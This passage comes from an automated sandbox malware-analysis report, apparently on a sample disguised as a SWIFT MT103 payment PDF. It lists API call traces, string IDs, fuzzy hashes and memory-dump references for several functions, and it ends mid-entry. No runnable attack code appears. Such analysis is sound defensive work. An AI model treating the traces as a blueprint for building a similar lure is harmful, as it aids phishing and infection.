                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: LoadString_printf$__swprintf_wcslen
                                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                        • API String ID: 3590180749-2894483878
                                                        • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                        • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                        • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                        • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                        • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                                        • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                        • DeleteObject.GDI32(?), ref: 0046F950
                                                        • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                                        • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                        • DeleteObject.GDI32(?), ref: 0046F9CF
                                                        • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                        • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                        • DestroyIcon.USER32(?), ref: 0046FA4F
                                                        • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                        • DeleteObject.GDI32(?), ref: 0046FA68
                                                        • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                        • String ID:
                                                        • API String ID: 3412594756-0
                                                        • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                        • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                        • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                        • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                        APIs
                                                          • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                          • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                        • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                        • API String ID: 4013263488-4113822522
                                                        • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                        • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                        • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                        • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                        • String ID:
                                                        • API String ID: 228034949-0
                                                        • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                        • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                        • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                        • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                        • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                        • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                        • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                        • DeleteObject.GDI32(?), ref: 00433603
                                                        • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                        • String ID:
                                                        • API String ID: 3969911579-0
                                                        • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                        • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                        • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                        • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                        APIs
                                                        • GetParent.USER32 ref: 00445A8D
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                        • __wcsicoll.LIBCMT ref: 00445AC4
                                                        • __wcsicoll.LIBCMT ref: 00445AE0
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __wcsicoll$ClassMessageNameParentSend
                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 3125838495-3381328864
                                                        • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                        • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                        • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                        • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                        APIs
                                                          • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                          • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                        • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                        • _wcscpy.LIBCMT ref: 00475F18
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                        • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                        • API String ID: 3052893215-4176887700
                                                        • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                        • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                        • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                        • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                        APIs
                                                        • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                        • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                        • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                        • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                        • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                        • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                        • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                          • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                        • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                        • String ID: Version$\TypeLib$interface\
                                                        • API String ID: 656856066-939221531
                                                        • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                        • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                        • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                        • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                        APIs
                                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                        • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                        • __swprintf.LIBCMT ref: 0045E6EE
                                                        • _printf.LIBCMT ref: 0045E7A9
                                                        • _printf.LIBCMT ref: 0045E7D2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: LoadString_printf$__swprintf_wcslen
                                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 3590180749-2354261254
                                                        • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                        • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                        • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                        • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __swprintf_wcscpy$__i64tow__itow
                                                        • String ID: %.15g$0x%p$False$True
                                                        • API String ID: 3038501623-2263619337
                                                        • Opcode ID: f6afd322ba0edba726905406a1e9dd29d429ed3593958b8e2b8cf15ef1d9fc27
                                                        • Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
                                                        • Opcode Fuzzy Hash: f6afd322ba0edba726905406a1e9dd29d429ed3593958b8e2b8cf15ef1d9fc27
                                                        • Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                                                        APIs
                                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                        • _memset.LIBCMT ref: 00458194
                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                        • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                        • API String ID: 2255324689-22481851
                                                        • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                        • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                        • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                        • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                        APIs
                                                        • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                        • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                        • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                        • __wcsicoll.LIBCMT ref: 004585D6
                                                        • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                        • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                        • String ID: ($interface$interface\
                                                        • API String ID: 2231185022-3327702407
                                                        • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                        • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                        • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                        • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                        APIs
                                                        • WSAStartup.WSOCK32(00000101,?), ref: 004365A5
                                                        • gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
                                                        • gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
                                                        • _wcscpy.LIBCMT ref: 004365F5
                                                        • WSACleanup.WSOCK32 ref: 004365FD
                                                        • inet_ntoa.WSOCK32(00000100,?), ref: 00436624
                                                        • _strcat.LIBCMT ref: 0043662F
                                                        • _wcscpy.LIBCMT ref: 00436644
                                                        • WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
                                                        • _wcscpy.LIBCMT ref: 00436666
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                        • String ID: 0.0.0.0
                                                        • API String ID: 2691793716-3771769585
                                                        • Opcode ID: 6fd0916b733944c34c34606087ec17de0ec27234914b4a2c9fe6d63e5041ad4e
                                                        • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                        • Opcode Fuzzy Hash: 6fd0916b733944c34c34606087ec17de0ec27234914b4a2c9fe6d63e5041ad4e
                                                        • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                        • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                          • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                          • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                        • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                        • __lock.LIBCMT ref: 00416B8A
                                                        • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                        • __lock.LIBCMT ref: 00416BAB
                                                        • ___addlocaleref.LIBCMT ref: 00416BC9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                        • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                        • API String ID: 1028249917-2843748187
                                                        • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                        • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                        • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                        • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                        APIs
                                                        • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
